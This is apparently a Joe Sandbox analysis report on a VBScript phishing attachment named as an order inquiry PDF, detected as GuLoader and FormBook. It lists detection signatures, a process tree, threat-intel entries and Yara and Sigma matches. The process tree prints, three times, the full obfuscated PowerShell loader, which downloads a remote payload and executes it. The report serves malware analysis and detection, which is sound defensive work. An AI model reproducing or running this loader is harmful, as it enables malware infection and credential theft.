Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order Inquiry RFQ #278823_pdf.vbs

Overview

General Information

Sample name:Order Inquiry RFQ #278823_pdf.vbs
Analysis ID:1511860
MD5:c1e9b6e5c75b875ff959e374ce28fd7f
SHA1:36e5e0c10f38eaadee2ae715f861a51830f4cb3e
SHA256:a19a973707d1d16cc53b04c265f87c650fd58e6beeabd9244a95701ed8a0df2d
Tags:vbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. ,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7656 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7928 cmdline: "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. ,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7944 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. ,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • cmd.exe (PID: 8100 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • wabmig.exe (PID: 7172 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
            • osqpHpjBCXXA.exe (PID: 824 cmdline: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • ktmutil.exe (PID: 648 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
                • osqpHpjBCXXA.exe (PID: 5596 cmdline: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • firefox.exe (PID: 2828 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wabmig.exe (PID: 7188 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • wabmig.exe (PID: 1072 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bdf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bdf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 15 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_7512.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine|base64offset|contains: "z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", ProcessId: 7404, ProcessName: wscript.exe
